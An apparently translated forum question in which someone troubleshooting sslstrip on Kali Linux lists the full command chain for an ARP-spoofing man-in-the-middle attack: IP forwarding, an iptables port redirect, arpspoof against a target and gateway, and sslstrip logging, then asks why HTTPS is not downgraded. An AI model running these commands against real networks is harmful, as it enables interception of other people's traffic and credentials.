我一直在关注本指南:https ://www.cybrary.it/0p3n/using-sslstrip-in-kali-linux/ 和其他人,例如:官方 Sslstrip 一:https ://moxie.org/software/ sslstrip/ 没有任何成功。
我正在使用:
5.2.0-kali2-amd64 #1 SMP Debian 5.2.9-2kali1 (2019-08-22) x86_64 GNU/Linux
sslstrip 0.9 by Moxie Marlinspike
和arpspoof。
我先跑:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080
然后进行arp欺骗:
arpspoof -i <interface> -t <targetIP> -r <gatewayIP>
然后sslstrip:
sslstrip -w testfile.txt -l 8080
然后我要去我的目标机器,运行 Safari 浏览器的 iPhone。我正在删除所有缓存和临时文件。我正在浏览非 HSTS 预加载网站(linkedin.com、zsecurity.org)。我没有指定 https:// ,而只是指定域名(例如:linkedin.com)。他们仍然在 https 中加载。
我在另一个运行 Windows 和 Internet Explorer 的客户端上对此进行了多次测试。同样的结果,我不能让目标强制使用 http。
来自 sslstrip 的 testsfile.txt 是空的。我期待客户端会打开 http 网页。
我究竟做错了什么?